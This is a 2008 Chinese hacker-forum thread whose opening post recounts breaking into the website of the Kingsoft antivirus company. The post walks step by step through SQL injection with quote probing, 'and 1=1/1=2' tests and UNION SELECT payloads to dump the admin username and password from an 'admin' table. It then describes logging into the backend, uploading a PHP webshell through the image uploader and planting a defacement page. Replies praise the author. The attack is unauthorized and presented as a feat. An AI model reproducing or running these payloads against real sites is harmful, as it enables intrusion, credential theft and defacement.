找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 1591|回复: 6

友情检测强大的金山毒霸公司

[复制链接]

12

主题

85

回帖

137

牛毛

一级牛人

http://hanfei.71free.cn/heila

积分
137
发表于 2008-12-21 12:28:22 | 显示全部楼层 来自 云南省红河州
高手实在是高!

63

主题

1027

回帖

1520

牛毛

二级牛人

积分
1520
发表于 2008-12-21 12:31:47 | 显示全部楼层 来自 四川省成都市
说实话 真的好牛B

30

主题

632

回帖

904

牛毛

一级牛人

________∥ 花 逝,美 的 讓 乆

积分
904
发表于 2008-12-21 12:47:43 | 显示全部楼层 来自 重庆市永川区
呵、!

莪是路过的。!

..

1778

主题

5094

回帖

1万

牛毛

论坛管理员

佚名

积分
14675
QQ
发表于 2008-12-21 12:51:00 | 显示全部楼层
[s:164][s:164][s:164] 真的假的啊!你黑的,還是轉來的!

1

主题

77

回帖

107

牛毛

一级牛人

积分
107
 楼主| 发表于 2008-12-21 12:25:37 | 显示全部楼层 |阅读模式 来自 北京市
友情检测强大的金山毒霸公司!作者:寂寞黑夜
来源:www.xbsafe.cn

记得上次CCTV被黑.是一个SA注入点,而且大家很早就知道.只是不敢动而已,后来小波动了.这次金山也纯在这个注入漏洞.呵呵..
首先我看了下主页.一切都很正常.


于是点击新闻看看... 提交'
http://www.duba.com.hk/***ws.php?nid=00***00***'
出错了.从错误中可以得知.该页面存在注入.且站点使用mysql数据库
呵呵..sql语言好久没复习了..



然后在这个页面上在提交http://www.duba.com.hk/****.php?nid=00***00**** and 1=1
返回正常...
然后在提交http://www.duba.com.hk/n****s.php?nid=00***00****4 and 1=2
返回的页面不一样...确定金山安全公司的***.php这个页面存在注入漏洞...
于是立即打开google开始对他进行踩点,


好多信息.金山果然是国内大名鼎鼎的杀毒厂商..JB新闻真多.. 不管了 一个一个找
找到了一个奇怪的连接是鸟文的我点进去看...
http://www.duba.com.hk/founder/****.php?cng_region=1&nid=000****0000***
然后提交http://www.duba.com.hk/founder/****.php?cng_region=1&nid=000****0000***'
页面错误提示我
invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\'' at line 1
于是我在提交http://www.duba.com.hk/founder/***.php?cng_region=1&nid=000****0000*** and 1=1
返回页面正常
提交http://www.duba.com.hk/founder/***.php?cng_region=1&nid=000****0000*** and 1=2
页面是空的于是我决定就用这个注入点下手....
提交http://www.duba.com.hk/founder/***.php?cng_region=1&nid=000****0000*** and 1=2 union select 1,2,3 from admin
发现页面提示我select查询语句错误


开始感觉奇怪了..管理员表根据我平时数据库设计俺就弄了一个3个列 难道还有其他的?
于是我再次提交了http://www.duba.com.hk/founder/****.php?cng_region=1&nid=00***00**** and 1=2 union select 1,2,3,4 from admin
呵呵..出来了.. 被我猜中了...页面爆出 3 4 列有东西...看来平时好好学习数据库设计还是有用的...




接下来就是提交:http://www.duba.com.hk/founder/****.php?cng_region=1&nid=000****0000*** and 1=2 union select 1,2,username,4 from admin 成功的爆出管理员用户名



那当然第4的位置应该是密码了...密码一般管理员都是用password,pas,pwd,等作为数据库列名 那我们就一个一个试吧
提交:http://www.duba.com.hk/founder/***.php?cng_region=1&nid=000****0000*** and 1=2 union select 1,2,username,password from admin
列名不对:页面提示我:invalid query: Unknown column 'password' in 'field list'
那就用第二个吧pas:我们继续提交地址:http://www.duba.com.hk/founder/***.php?cng_region=1&nid=000****0000*** and 1=2 union select 1,2,username,pas from admin
还是错的..晕死.. 继续试..发扬乌龟精神..
继续提交地址:http://www.duba.com.hk/founder/****.php?cng_region=1&nid=000****0000*** and 1=2 union select 1,2,username,pwd from admin
嘿嘿..搞定了..原来列名是pwd的..简写..


在已经有管理员账号密码了 登陆后台...


找了很久..才找到一个上次的地方...


图片的地方可以直接上次php的..成功的得到webshell


黑页地址:http://www.duba.com.hk/founder/images/product/p_help.html


呵呵...其实没什么技术含量..管理员疏忽了sql注入漏洞而已..但是小小漏洞危害大..
最后想和我交流的欢迎到www.xbsafe.cn 我的论坛ID是小道[s:150]

PS:
对安全人士来说 : 一招 致命,你防了吗?
对黑客人士来说 : 一招 致命,你会了吗?
技术是无罪的,快乐就在思考。
攻防是种哲学,输赢只在一招。

4

主题

39

回帖

62

牛毛

初生牛犊

积分
62
发表于 2010-3-5 11:42:09 | 显示全部楼层 来自 山西省长治市
LZ很强哦。。。。。

33

主题

57

回帖

148

牛毛

一级牛人

积分
148
发表于 2010-3-10 17:33:56 | 显示全部楼层 来自 广东省江门市
LZ很强哦。。。。。
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-25 05:40 , Processed in 0.152446 second(s), 65 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表